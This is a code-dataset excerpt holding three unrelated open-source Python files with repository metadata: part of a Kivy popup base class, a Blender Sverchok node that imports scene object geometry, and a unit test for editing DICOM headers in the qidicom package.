popup.bind(on_dismiss=my_callback)
popup.open()
If you include XBase.BUTTON_CANCEL in your set of buttons, then you can
use :meth:`XBase.is_canceled` to check if it was pressed::
def my_callback(instance):
if instance.is_canceled():
print('Popup was canceled.')
else:
print('Button "', instance.button_pressed, '" was pressed.')
"""
from kivy import metrics
from kivy.factory import Factory
from kivy.properties import BooleanProperty, ListProperty, StringProperty,\
NumericProperty
from kivy.uix.boxlayout import BoxLayout
try:
from .tools import gettext_ as _
from .xpopup import XPopup
except:
from tools import gettext_ as _
from xpopup import XPopup
__author__ = 'ophermit'
class XBase(XPopup):
"""XBase class. See module documentation for more information.
"""
auto_open = BooleanProperty(True)
'''This property determines if the pop-up is automatically
opened when the instance was created. Otherwise use :meth:`XBase.open`
:attr:`auto_open` is a :class:`~kivy.properties.BooleanProperty` and
defaults to True.
'''
buttons = ListProperty()
'''List of button names. Can be used when using custom button sets.
:attr:`buttons` is a :class:`~kivy.properties.ListProperty` and defaults to
[].
'''
button_pressed = StringProperty('')
'''Name of button which has been pressed.
:attr:`button_pressed` is a :class:`~kivy.properties.StringProperty` and
defaults to '', read-only.
'''
size_hint_x = NumericProperty(.6, allownone=True)
size_hint_y = NumericProperty(.3, allownone=True)
auto_dismiss = BooleanProperty(False)
'''Overrides properties from :class:`~kivy.uix.popup.Popup`
'''
min_width = NumericProperty(metrics.dp(300), allownone=True)
min_height = NumericProperty(metrics.dp(150), allownone=True)
fit_to_window = BooleanProperty(True)
'''Overrides properties from :class:`XPopup`
'''
BUTTON_OK = _('Ok')
BUTTON_CANCEL = _('Cancel')
BUTTON_YES = _('Yes')
BUTTON_NO = _('No')
BUTTON_CLOSE = _('Close')
'''Basic button names
'''
def __init__(self, **kwargs):
# preventing change content of the popup
kwargs.pop('content', None)
self._pnl_buttons = None
super(XBase, self).__init__(**kwargs)
layout = BoxLayout(orientation="vertical")
layout.add_widget(self._get_body())
self._pnl_buttons = BoxLayout(size_hint_y=None)
layout.add_widget(self._pnl_buttons)
self.add_widget(layout)
# creating buttons panel
self.property('buttons').dispatch(self)
if self.auto_open:
self.open()
def _on_click(self, instance):
self.button_pressed = instance.id
self.dismiss()
def _get_body(self):
"""Returns the content of the popup. You need to implement
this in your subclass.
"""
raise NotImplementedError
def on_buttons(self, instance, buttons):
if self._pnl_buttons is None:
return
self._pnl_buttons.clear_widgets()
if len(buttons) == 0:
self._pnl_buttons.height = 0
return
self._pnl_buttons.height = metrics.dp(30)
for button in buttons:
self._pnl_buttons.add_widget(
Factory.XButton(
text=button, id=button, on_release=self._on_click))
def is_canceled(self):
"""Check the `cancel` event
:return: True, if the button 'Cancel' has been pressed
"""
return self.button_pressed == self.BUTTON_CANCEL
| gpl-3.0 | 3,830,199,417,355,320,300 | 28.786164 | 79 | 0.641047 | false |
DolphinDream/sverchok | nodes/scene/objects_mk3.py | 1 | 12461 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import BoolProperty, StringProperty
import bmesh
import sverchok
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.utils.nodes_mixins.sv_animatable_nodes import SvAnimatableNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_bmesh_utils import pydata_from_bmesh
from sverchok.core.handlers import get_sv_depsgraph, set_sv_depsgraph_need
from sverchok.utils.nodes_mixins.show_3d_properties import Show3DProperties
class SvOB3BDataCollection(bpy.types.PropertyGroup):
name: bpy.props.StringProperty()
icon: bpy.props.StringProperty(default="BLANK1")
class SVOB3B_UL_NamesList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_icon = item.icon
if not item.icon or item.icon == "BLANK1":
try:
item_icon = 'OUTLINER_OB_' + bpy.data.objects[item.name].type
except:
item_icon = ""
layout.label(text=item.name, icon=item_icon)
action = data.wrapper_tracked_ui_draw_op(layout, "node.sv_ob3b_collection_operator", icon='X', text='')
action.fn_name = 'REMOVE'
action.idx = index
class SvOB3BItemOperator(bpy.types.Operator):
bl_idname = "node.sv_ob3b_collection_operator"
bl_label = "bladibla"
idname: bpy.props.StringProperty(name="node name", default='')
idtree: bpy.props.StringProperty(name="tree name", default='')
fn_name: bpy.props.StringProperty(default='')
idx: bpy.props.IntProperty()
def execute(self, context):
node = bpy.data.node_groups[self.idtree].nodes[self.idname]
if self.fn_name == 'REMOVE':
node.object_names.remove(self.idx)
node.process_node(None)
return {'FINISHED'}
class SvOB3Callback(bpy.types.Operator):
bl_idname = "node.ob3_callback"
bl_label = "Object In mk3 callback"
bl_options = {'INTERNAL'}
fn_name: StringProperty(default='')
idname: StringProperty(name="node name", default='')
idtree: StringProperty(name="tree name", default='')
def execute(self, context):
"""
returns the operator's 'self' too to allow the code being called to
print from self.report.
"""
if self.idtree and self.idname:
ng = bpy.data.node_groups[self.idtree]
node = ng.nodes[self.idname]
else:
node = context.node
getattr(node, self.fn_name)(self)
return {'FINISHED'}
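# Note (inferred from the operator above): SvOB3Callback dispatches by name --
# the UI sets `fn_name` to a node method such as 'get_objects_from_scene' and
# execute() simply resolves it with getattr(node, fn_name)(self).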
class SvObjectsNodeMK3(Show3DProperties, bpy.types.Node, SverchCustomTreeNode, SvAnimatableNode):
"""
Triggers: obj Input Scene Objects pydata
Tooltip: Get Scene Objects into Sverchok Tree
"""
bl_idname = 'SvObjectsNodeMK3'
bl_label = 'Objects in'
bl_icon = 'OUTLINER_OB_EMPTY'
sv_icon = 'SV_OBJECTS_IN'
def hide_show_versgroups(self, context):
outs = self.outputs
showing_vg = 'Vers_grouped' in outs
if self.vergroups and not showing_vg:
outs.new('SvStringsSocket', 'Vers_grouped')
elif not self.vergroups and showing_vg:
outs.remove(outs['Vers_grouped'])
def modifiers_handle(self, context):
set_sv_depsgraph_need(self.modifiers)
updateNode(self, context)
groupname: StringProperty(
name='groupname', description='group of objects (green outline CTRL+G)',
default='', update=updateNode)
modifiers: BoolProperty(
name='Modifiers',
description='Apply modifier geometry to import (original untouched)',
default=False, update=modifiers_handle)
vergroups: BoolProperty(
name='Vergroups',
        description='Use vertex groups for nested insertion',
default=False, update=hide_show_versgroups)
sort: BoolProperty(
name='sort by name',
        description='sort inserted objects by name',
default=True, update=updateNode)
object_names: bpy.props.CollectionProperty(type=SvOB3BDataCollection, options={'SKIP_SAVE'})
active_obj_index: bpy.props.IntProperty()
def sv_init(self, context):
new = self.outputs.new
new('SvVerticesSocket', "Vertices")
new('SvStringsSocket', "Edges")
new('SvStringsSocket', "Polygons")
new('SvStringsSocket', "MaterialIdx")
new('SvMatrixSocket', "Matrixes")
new('SvObjectSocket', "Object")
def get_objects_from_scene(self, ops):
"""
Collect selected objects
"""
self.object_names.clear()
        groups = bpy.data.groups
        if self.groupname and groups[self.groupname].objects:
            names = [obj.name for obj in groups[self.groupname].objects]
else:
names = [obj.name for obj in bpy.data.objects if (obj.select_get() and len(obj.users_scene) > 0 and len(obj.users_collection) > 0)]
if self.sort:
names.sort()
for name in names:
item = self.object_names.add()
item.name = name
item.icon = 'OUTLINER_OB_' + bpy.data.objects[name].type
if not self.object_names:
ops.report({'WARNING'}, "Warning, no selected objects in the scene")
return
self.process_node(None)
def select_objs(self, ops):
"""select all objects referenced by node"""
        for item in self.object_names:
            bpy.data.objects[item.name].select_set(True)

        if not self.object_names:
            ops.report({'WARNING'}, "Warning, no objects associated with this node")
def draw_obj_names(self, layout):
if self.object_names:
layout.template_list("SVOB3B_UL_NamesList", "", self, "object_names", self, "active_obj_index")
else:
layout.label(text='--None--')
def draw_buttons(self, context, layout):
self.draw_animatable_buttons(layout, icon_only=True)
col = layout.column(align=True)
row = col.row()
op_text = "Get selection" # fallback
callback = 'node.ob3_callback'
try:
addon = context.preferences.addons.get(sverchok.__name__)
if addon.preferences.over_sized_buttons:
row.scale_y = 4.0
op_text = "G E T"
except:
pass
self.wrapper_tracked_ui_draw_op(row, callback, text=op_text).fn_name = 'get_objects_from_scene'
col = layout.column(align=True)
row = col.row(align=True)
row.prop(self, 'sort', text='Sort', toggle=True)
row.prop(self, "modifiers", text="Post", toggle=True)
row.prop(self, "vergroups", text="VeGr", toggle=True)
self.draw_obj_names(layout)
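    # Layout summary (descriptive note, not original code): draw_buttons shows the
    # "Get selection" operator button (scaled up when over-sized buttons are enabled
    # in the add-on preferences), the Sort/Post/VeGr toggles, and the list of
    # captured object names.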
def draw_buttons_ext(self, context, layout):
layout.prop(self, 'draw_3dpanel', text="To Control panel")
self.draw_animatable_buttons(layout)
def draw_buttons_3dpanel(self, layout):
callback = 'node.ob3_callback'
row = layout.row(align=True)
row.label(text=self.label if self.label else self.name)
colo = row.row(align=True)
colo.scale_x = 1.6
self.wrapper_tracked_ui_draw_op(colo, callback, text='Get').fn_name = 'get_objects_from_scene'
def get_verts_and_vertgroups(self, obj_data):
vers = []
vers_grouped = []
for k, v in enumerate(obj_data.vertices):
if self.vergroups and v.groups.values():
vers_grouped.append(k)
vers.append(list(v.co))
return vers, vers_grouped
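    # Note: `vers_grouped` collects the *indices* of vertices that belong to at
    # least one vertex group (only when the VeGr toggle is enabled); the vertex
    # coordinates themselves always go into `vers`.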
def get_materials_from_bmesh(self, bm):
return [face.material_index for face in bm.faces[:]]
def get_materials_from_mesh(self, mesh):
return [face.material_index for face in mesh.polygons[:]]
def sv_free(self):
set_sv_depsgraph_need(False)
def process(self):
if not self.object_names:
return
scene = bpy.context.scene
data_objects = bpy.data.objects
outputs = self.outputs
edgs_out = []
vers_out = []
vers_out_grouped = []
pols_out = []
mtrx_out = []
materials_out = []
if self.modifiers:
sv_depsgraph = get_sv_depsgraph()
# iterate through references
for obj in (data_objects.get(o.name) for o in self.object_names):
if not obj:
continue
edgs = []
vers = []
vers_grouped = []
pols = []
mtrx = []
materials = []
with self.sv_throttle_tree_update():
mtrx = obj.matrix_world
                if obj.type in {'EMPTY', 'CAMERA', 'LAMP', 'LIGHT'}:
mtrx_out.append(mtrx)
continue
try:
if obj.mode == 'EDIT' and obj.type == 'MESH':
                        # Mesh objects in Edit mode do not currently return what
                        # you see in the 3D view when using obj.to_mesh, so read
                        # the edit-mode BMesh instead.
me = obj.data
bm = bmesh.from_edit_mesh(me)
vers, edgs, pols = pydata_from_bmesh(bm)
materials = self.get_materials_from_bmesh(bm)
del bm
else:
"""
this is where the magic happens.
because we are in throttled tree update state at this point, we can aquire a depsgraph if
- modifiers
- or vertex groups are desired
"""
if self.modifiers:
obj = sv_depsgraph.objects[obj.name]
obj_data = obj.to_mesh(preserve_all_data_layers=True, depsgraph=sv_depsgraph)
else:
obj_data = obj.to_mesh()
if obj_data.polygons:
pols = [list(p.vertices) for p in obj_data.polygons]
vers, vers_grouped = self.get_verts_and_vertgroups(obj_data)
materials = self.get_materials_from_mesh(obj_data)
edgs = obj_data.edge_keys
obj.to_mesh_clear()
                except Exception as err:
                    print('failure while processing object in node', self.name, err)
vers_out.append(vers)
edgs_out.append(edgs)
pols_out.append(pols)
mtrx_out.append(mtrx)
materials_out.append(materials)
vers_out_grouped.append(vers_grouped)
if vers_out and vers_out[0]:
outputs['Vertices'].sv_set(vers_out)
outputs['Edges'].sv_set(edgs_out)
outputs['Polygons'].sv_set(pols_out)
if 'MaterialIdx' in outputs:
outputs['MaterialIdx'].sv_set(materials_out)
if 'Vers_grouped' in outputs and self.vergroups:
outputs['Vers_grouped'].sv_set(vers_out_grouped)
outputs['Matrixes'].sv_set(mtrx_out)
outputs['Object'].sv_set([data_objects.get(o.name) for o in self.object_names])
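        # Note: the geometry sockets above are only written when at least one
        # object produced vertices; Matrixes and Object are always refreshed.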
def save_to_json(self, node_data: dict):
node_data['object_names'] = [o.name for o in self.object_names]
def load_from_json(self, node_data: dict, import_version: float):
for named_object in node_data.get('object_names', []):
self.object_names.add().name = named_object
classes = [SvOB3BItemOperator, SvOB3BDataCollection, SVOB3B_UL_NamesList, SvOB3Callback, SvObjectsNodeMK3]
register, unregister = bpy.utils.register_classes_factory(classes)
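# The register()/unregister() pair produced by register_classes_factory is what
# Blender/Sverchok calls when the add-on is enabled or disabled (assumption:
# standard Blender class-registration flow).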
| gpl-3.0 | -1,058,146,421,217,799,300 | 33.233516 | 143 | 0.595137 | false |
ohsu-qin/qidicom | test/unit/test_meta.py | 1 | 2275 | import os
import glob
import shutil
from nose.tools import (assert_equal, assert_true)
from qidicom import (reader, writer, meta)
from .. import ROOT
from ..helpers.logging import logger
FIXTURE = os.path.join(ROOT, 'fixtures', 'dicom')
"""The test fixture."""
RESULTS = os.path.join(ROOT, 'results', 'dicom')
"""The test results directory."""
class TestMeta(object):
"""
The dicom meta unit tests.
:Note: these tests also indirectly test the writer module.
"""
def setUp(self):
shutil.rmtree(RESULTS, True)
def tearDown(self):
shutil.rmtree(RESULTS, True)
def test_editor(self):
# A trivial edit function.
bd_func = lambda bd: '20000101'
# The tag name => value edit dictionary.
edits = dict(PatientID='Test Patient', BodyPartExamined='HIP',
PatientsBirthDate=bd_func)
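        # Note (behaviour inferred from this test, not from qidicom docs): edit
        # values may be plain strings or callables; a callable receives the tag's
        # current value and returns the replacement (here a fixed birth date).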
# Make the editor.
editor = meta.Editor(**edits)
# An array to collect the input files.
in_files = []
# Edit the headers.
for ds in writer.edit(FIXTURE, dest=RESULTS):
editor.edit(ds)
in_files.append(ds.filename)
# Verify the result.
targets = set((self._target_file_location(f) for f in in_files))
results = set((ds.filename for ds in reader.iter_dicom(*targets)))
assert_equal(targets, results, "Result files are incorrect: %s" %
results)
for ds in reader.iter_dicom(*targets):
for tag in ['PatientID', 'BodyPartExamined']:
expected = edits[tag]
actual = getattr(ds, tag)
assert_equal(actual, expected, "Edited DICOM tag %s incorrect:"
" %s" % (tag, actual))
expected_bd = bd_func(None)
actual_bd = ds.PatientsBirthDate
assert_equal(actual_bd, expected_bd,
"Edited DICOM tag %s incorrect: %s" %
                     ('PatientsBirthDate', actual_bd))
def _target_file_location(self, in_file):
_, fname = os.path.split(in_file)
return os.path.join(RESULTS, fname)
if __name__ == "__main__":
import nose
nose.main(defaultTest=__name__)
| bsd-2-clause | -3,745,693,098,825,385,000 | 31.971014 | 79 | 0.568352 | false |